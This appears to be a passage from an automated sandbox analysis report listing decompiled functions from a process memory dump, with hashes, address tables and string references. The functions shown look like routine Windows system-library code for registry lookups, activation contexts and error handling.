Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 8151AF72104716AFC324DF58C840A6BBBF4FF58714F00892EFA9587690E7B4E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01233540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01233540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x12ad360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E011F0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01233706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E011FFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01233540;
						E011FFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0120DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01240C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E011F97C0();
					}
					return E011FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01233971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01233884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E011FFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E011F9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01233787(_a4,  &_v352, _t80);
						}
					}
					L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E011F95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01233552
0x0123355a
0x0123355d
0x01233566
0x01233567
0x0123357e
0x0123358f
0x012335a1
0x012335a5
0x0123366b
0x0123366b
0x0123366d
0x01233672
0x01233679
0x01233685
0x0123368d
0x0123369d
0x012336a7
0x012336b8
0x012336c6
0x012336c7
0x012336dc
0x012336e1
0x012336e7
0x012336e9
0x012336e9
0x01233703
0x01233703
0x012335b5
0x012335c0
0x012335c4
0x00000000
0x00000000
0x012335ca
0x012335d7
0x012335e2
0x012335e6
0x012335e8
0x012335f5
0x012335fa
0x01233603
0x01233604
0x01233609
0x0123360a
0x01233612
0x01233613
0x0123361e
0x01233622
0x01233628
0x0123362f
0x0123362f
0x01233636
0x01233638
0x0123363b
0x01233642
0x01233642
0x01233636
0x01233657
0x01233657
0x0123365c
0x01233662
0x01233669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0123358F

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: f39eda21c018857632a33588ee98baea84b820002145317dc89c6af9849f5067
Instruction ID: f11a8243ecaaa1723b2d99864ab7b5f13cfb037458f959155051686750d06848
Opcode Fuzzy Hash: f39eda21c018857632a33588ee98baea84b820002145317dc89c6af9849f5067
Instruction Fuzzy Hash: 534124F291052D9FDB21DA50CC84FEEB77CAB54718F0045A5E709AB240DB709F898F98

Uniqueness

Uniqueness Score: -1.00%

Function 012805AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E012805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E012807DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E011F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0127A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0127A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01281293(_t79, _v40, E012807DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E011D7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0127138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x012805c5
0x012805ca
0x012805d3
0x012806db
0x012806db
0x012806dd
0x012806e3
0x012806e3
0x012805dd
0x012805e7
0x012805f6
0x01280600
0x01280607
0x01280610
0x01280615
0x0128061a
0x0128061c
0x0128061e
0x01280624
0x01280625
0x01280627
0x01280628
0x01280631
0x01280640
0x0128064d
0x01280654
0x01280654
0x01280631
0x0128066d
0x01280674
0x00000000
0x00000000
0x01280692
0x0128069e
0x012806b0
0x012806a0
0x012806a9
0x012806a9
0x012806b8
0x012806d6
0x012806d6
0x00000000

Strings

`, xrefs: 01280633

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 1cc3f9a54bde63265f827186fca8a9d96d7ec58bd52fab1ffde9c3561c21b2f0
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 3E31F3322107166FE720EE29CC45F9B7BD9AB84758F184229FA549B2C0D770E918CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01233884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01233884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E011F9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L011D4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E011F9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01233893
0x01233896
0x01233899
0x0123389f
0x012338a0
0x012338a4
0x012338a9
0x012338ac
0x012338ad
0x012338ae
0x012338af
0x012338b1
0x012338b4
0x012338bb
0x012338bc
0x012338bd
0x012338c4
0x012338c8
0x012338ca
0x012338ca
0x012338d5
0x0123393e
0x01233940
0x01233942
0x01233952
0x01233954
0x01233961
0x01233961
0x01233967
0x0123396e
0x0123396e
0x01233947
0x0123394c
0x00000000
0x0123394c
0x012338ea
0x012338ee
0x012338f8
0x012338f9
0x012338ff
0x01233900
0x01233902
0x01233903
0x0123390b
0x0123390f
0x01233950
0x00000000
0x01233950
0x01233915
0x0123391d
0x0123391d
0x01233922
0x01233926
0x00000000
0x01233928
0x0123392b
0x0123392b
0x01233935
0x01233937
0x01233937
0x00000000
0x01233935
0x01233926
0x012338f0
0x00000000

Strings

BinaryName, xrefs: 012338B4

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 552e7281ce77bc9290f5ce763efc3185d13c79c345cee774fb8a569c28278d44
Instruction ID: 9d0a14dc5656cdeda187f1ae645dd9c5fdb01763e10d67ea00d3914a96fbc3d0
Opcode Fuzzy Hash: 552e7281ce77bc9290f5ce763efc3185d13c79c345cee774fb8a569c28278d44
Instruction Fuzzy Hash: 4131C3B2D1151AEFEB15DA58C945E6BFB74FBC0B24F024169EA15AB290D7309F00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 011ED294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E011ED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x12ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E011D4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E011FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E011F98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E011F95D0();
					L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x011ed29c
0x011ed2a6
0x011ed2b1
0x011ed2b5
0x011ed2b6
0x011ed2bc
0x011ed2bd
0x011ed2be
0x011ed2bf
0x011ed2c2
0x011ed2c4
0x011ed2cc
0x011ed384
0x011ed34b
0x011ed34f
0x011ed350
0x011ed351
0x011ed35c
0x011ed35c
0x011ed2d6
0x011ed2da
0x011ed2e1
0x011ed361
0x011ed369
0x011ed36d
0x011ed2e3
0x011ed2e3
0x011ed2e3
0x011ed2e5
0x011ed2ed
0x011ed2f5
0x011ed2fa
0x011ed302
0x011ed303
0x011ed30b
0x011ed30f
0x011ed313
0x011ed318
0x011ed31c
0x011ed320
0x011ed379
0x011ed37d
0x00000000
0x00000000
0x0122affe
0x0122b001
0x0122b011
0x00000000
0x011ed322
0x011ed322
0x011ed330
0x011ed337
0x011ed35d
0x011ed339
0x011ed33f
0x011ed38c
0x011ed38c
0x011ed33f
0x011ed349
0x00000000
0x011ed349

Strings

@, xrefs: 011ED303

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 356d331405c8e5ad6ab5fa4ba7a404996983df3a95be03b0a08bf46ce2e01a67
Instruction ID: 3b98e944e56de5b944b8e31a533d98cd767117fa5f4db3a20016aa68a5a7ca79
Opcode Fuzzy Hash: 356d331405c8e5ad6ab5fa4ba7a404996983df3a95be03b0a08bf46ce2e01a67
Instruction Fuzzy Hash: FA31E4B550C7059FC729DFA8D984A5BFBE8EB85658F01092EF99483250D734DD04CB93

Uniqueness

Uniqueness Score: -1.00%

Function 011C1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E011C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E011FBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E011FA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E011FA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L011D4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x011c1b8f
0x011c1b9a
0x011c1b9c
0x011c1b9e
0x011c1ba3
0x01217010
0x01217010
0x00000000
0x011c1ba9
0x011c1ba9
0x011c1bae
0x00000000
0x011c1bc5
0x011c1bca
0x011c1bcf
0x011c1bd0
0x011c1bd1
0x011c1bd2
0x011c1bd6
0x011c1bdc
0x011c1be0
0x01216ffc
0x01217000
0x00000000
0x01217006
0x01217009
0x01217009
0x011c1be6
0x011c1bec
0x011c1c0b
0x011c1c0b
0x011c1c0c
0x011c1c11
0x011c1c12
0x011c1c15
0x011c1c1b
0x011c1c1f
0x011c1c31
0x011c1c33
0x01217026
0x01217026
0x011c1c21
0x011c1c24
0x011c1c24
0x011c1bee
0x011c1bee
0x011c1bf2
0x011c1c3a
0x011c1bf4
0x011c1bf4
0x011c1c05
0x011c1c05
0x011c1c09
0x011c1c3e
0x00000000
0x00000000
0x00000000
0x011c1c09
0x011c1bec
0x011c1be0
0x011c1bae
0x011c1c2e

Strings

WindowsExcludedProcs, xrefs: 011C1BC5

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: c3d82c5db335375dfd009cb16e3956ac6aae670f1a8ef18e60997e38a71217e3
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: AF210A7B640219FBDB2ADA59C840F9BBBADEFA1E50F064429FE048B205D734DD01C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 011DF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E011DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x011df71d
0x011df722
0x011df726
0x01224770
0x011df765
0x011df769
0x011df769
0x011df732
0x0122477a
0x00000000
0x0122477a
0x011df738
0x011df73a
0x011df73c
0x011df73f
0x011df746
0x011df778
0x011df7a9
0x011df7a9
0x011df754
0x011df75a
0x011df75d
0x011df75f
0x011df761
0x011df76f
0x011df771
0x011df771
0x011df76f
0x011df763
0x00000000
0x011df763
0x011df77d
0x011df7a3
0x011df7a5
0x00000000
0x011df7a5
0x011df77f
0x011df782
0x011df784
0x011df786
0x00000000
0x00000000
0x00000000
0x011df788
0x011df748
0x011df74d
0x011df78d
0x011df793
0x011df7b7
0x011df7bc
0x00000000
0x011df7bc
0x011df798
0x00000000
0x00000000
0x011df79d
0x011df7b0
0x00000000
0x011df7b0
0x011df79f
0x00000000
0x011df74f
0x011df74f
0x00000000
0x011df74f

Strings

Actx , xrefs: 011DF73F

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: da6f3eb0df1d016ebeadcc9e7dffab7e60121c16f7852cb65acce62e3f6fc6b4
Instruction ID: 5867eb652ac2d305570b82a851fab98d4b1487ab1c8bb7df05f64f8ec7649bfc
Opcode Fuzzy Hash: da6f3eb0df1d016ebeadcc9e7dffab7e60121c16f7852cb65acce62e3f6fc6b4
Instruction Fuzzy Hash: BB11E234304E838BEB6D4E1CC8947F67696AB85624F27452AE567CB391DB70DA43C342

Uniqueness

Uniqueness Score: -1.00%

Function 01268DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01268DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1290d50);
				E0120D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01245720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0120DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0120DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0120D130(_t34, _t39, _t40);
			}

0x01268df1
0x01268df1
0x01268df1
0x01268df1
0x01268df1
0x01268df1
0x01268df3
0x01268df8
0x01268dfd
0x01268e00
0x01268e0e
0x01268e2a
0x01268e36
0x01268e38
0x01268e3c
0x01268e46
0x01268e46
0x01268e36
0x01268e50
0x01268e56
0x01268e59
0x01268e5c
0x01268e60
0x01268e67
0x01268e6d
0x01268e73
0x01268e74
0x01268eb1
0x01268ebd

Strings

Critical error detected %lx, xrefs: 01268E21

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 573e959c3a1650250cdd6346bb245918895e36b94c136feaca306b8337b58b47
Instruction ID: a29d737d99cee732e650de78de365f362746ca66f98cac2a61167c684bb5b4da
Opcode Fuzzy Hash: 573e959c3a1650250cdd6346bb245918895e36b94c136feaca306b8337b58b47
Instruction Fuzzy Hash: 9F113975D25349DBDF29CFE889057ACBBB4AB18314F20425DE5696B2C2C3740641CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0124FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0124FF60

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 4d358e551992d4a75fda33272755440787dca0476fab76feaa8279369a3f7543
Instruction ID: cfe0dfb9efb00e2e2f80a6ac9e734f7e90dc4a382107669885be2e33861abe00
Opcode Fuzzy Hash: 4d358e551992d4a75fda33272755440787dca0476fab76feaa8279369a3f7543
Instruction Fuzzy Hash: 5F110475930549EFDF2ADB98C948FA8BBB1FF48704F558054F2086B1A1C7399940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01285BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c27c5eb0811123b38f34d21d225c9b66a0d53809b94a930bb17d475ce5234a
Instruction ID: 06a86a728e904d0d98b8de8fdaba823d28c26388e8b65a579cff6c781fa7550d
Opcode Fuzzy Hash: f0c27c5eb0811123b38f34d21d225c9b66a0d53809b94a930bb17d475ce5234a
Instruction Fuzzy Hash: 60426E7192121ACFDB24DF68C881BA9BBB1FF45304F1481AADA4DEB382D7749985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 011D4120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e493cfc47d648e82f79257c52dbf1799ae45fc78b30f73e9c3c8211b70cc8bd2
Instruction ID: 78bec5e80564c3f1bc8d7f9da9905db06f13929384f34aaced0068f83934cf62
Opcode Fuzzy Hash: e493cfc47d648e82f79257c52dbf1799ae45fc78b30f73e9c3c8211b70cc8bd2
Instruction Fuzzy Hash: B0F19F706183128FD729CF19C490A7AB7E1FF98714F45892EF986CBA90E734D881CB52

Uniqueness

Uniqueness Score: -1.00%

Function 011E20A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248ddba87c5e9f421c2a252923b0574f992b58833fc812428bacbb90a12382eb
Instruction ID: 104082b4d17aa2ca516644b74cf10a6c1db9e8df1162a2ed98064b5d36a48dc0
Opcode Fuzzy Hash: 248ddba87c5e9f421c2a252923b0574f992b58833fc812428bacbb90a12382eb
Instruction Fuzzy Hash: 71F12531618752AFE72ECF6CC45876EBBE9AF85314F08C51DEA958B281D774D840CB82

Uniqueness

Uniqueness Score: -1.00%

Function 011CD5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e0e9ded785e69af25006e802d8bae706ea0e33329363a772234c4901011100
Instruction ID: 1c70a497b5a411b7f93c97ee1b51d6a8735b48d53588989ec180fcb1bf953fb2
Opcode Fuzzy Hash: 24e0e9ded785e69af25006e802d8bae706ea0e33329363a772234c4901011100
Instruction Fuzzy Hash: 9AE1F430A0075ACFEF39DF68D884B6AB7B1BF65B08F0541ADDA0957291D7309D81CB92

Uniqueness

Uniqueness Score: -1.00%

Function 011C849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44eb045f80197ed11b312dafc65717bfee3fd8360c51b46a0f34267f5595ecf2
Instruction ID: 5ea14c62d92c7ba9b77200a652d6f915a9417b878601d86eb6724a093f0c1bae
Opcode Fuzzy Hash: 44eb045f80197ed11b312dafc65717bfee3fd8360c51b46a0f34267f5595ecf2
Instruction Fuzzy Hash: 50B17CB1E0021ADFDB19DFE8C9C4AADFBB5BF68708F10412DE505AB245E770A945CB80

Uniqueness

Uniqueness Score: -1.00%

Function 011E513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f3b0674270dab76facbaae894d0948bb3624fb7939d6e70f300c6cc7679ddfa
Instruction ID: a803ce735fd583fa48149c9c0aeda92fd5fd217b978bedb9e08f8ea8d93e7cc5
Opcode Fuzzy Hash: 1f3b0674270dab76facbaae894d0948bb3624fb7939d6e70f300c6cc7679ddfa
Instruction Fuzzy Hash: 69C113755083819FD358CF28C580A6AFBF2BF88308F18496EF9998B352D771E945CB42

Uniqueness

Uniqueness Score: -1.00%

